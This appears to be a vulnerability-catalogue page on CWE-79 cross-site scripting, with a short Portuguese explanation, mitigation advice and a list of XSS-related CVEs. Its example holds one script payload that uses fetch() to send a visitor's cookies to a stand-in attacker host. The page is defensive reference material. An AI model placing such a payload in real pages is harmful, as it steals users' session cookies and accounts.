Fallos del tipo CWE-79

28.804 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-2537—WooCommerce PDF Invoices & Packing Slips < 3.0.1 - Reflected Cross-Site ScriptingEPSS 0.7%CVE-2022-35945MEDIUMCross site scripting (XSS) via registration API in GLPIEPSS 0.7%CVE-2024-27306MEDIUMaiohttp vulnerable to XSS on index pages for static file handlingEPSS 0.7%CVE-2024-3084MEDIUMPHPGurukul Emergency Ambulance Hiring Portal Hire an Ambulance Page cross site scriptingEPSS 0.7%CVE-2025-5013MEDIUMHkCms Search index.html cross site scriptingEPSS 0.7%CVE-2024-27104MEDIUMStored XSS in dashboards in GLPIEPSS 0.7%CVE-2024-24135MEDIUMProduct Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSEPSS 0.7%CVE-2023-26445MEDIUMFrontend themes are defined by user-controllable jslob settings and could point to a malicious resource which gets processed during login. MEPSS 0.7%CVE-2023-26446MEDIUMThe users clientID at "application passwords" was not sanitized or escaped before being added to DOM. Malicious script code can be executed EPSS 0.7%CVE-2022-1536LOWautomad Dashboard cross site scriptingEPSS 0.7%CVE-2026-82642HIGHReadest: unsanitized iframe srcdoc attribute in the EPUB sanitizer can lead to arbitrary code executionEPSS 0.7%CVE-2022-43561MEDIUMPersistent Cross-Site Scripting in “Save Table” Dialog in Splunk EnterpriseEPSS 0.7%CVE-2023-26447MEDIUMThe "upsell" widget for the portal allows to specify a product description. This description taken from a user-controllable jslob did not geEPSS 0.7%CVE-2023-48197MEDIUMCross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cooEPSS 0.7%CVE-2021-32737HIGHXSS Injection in Media Collection Title was possibleEPSS 0.7%CVE-2024-52053HIGHStored Cross-Site Scripting in Wowza Streaming EngineEPSS 0.7%CVE-2023-26448MEDIUMCustom log-in and log-out locations are used-defined as jslob but were not checked to contain malicious protocol handlers. Malicious script EPSS 0.7%CVE-2024-29049MEDIUMMicrosoft Edge (Chromium-based) Webview2 Spoofing VulnerabilityEPSS 0.7%CVE-2021-24315—Give WP < 2.10.4 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.7%CVE-2021-4103MEDIUMCross-site Scripting (XSS) - Stored in vanessa219/vditorEPSS 0.7%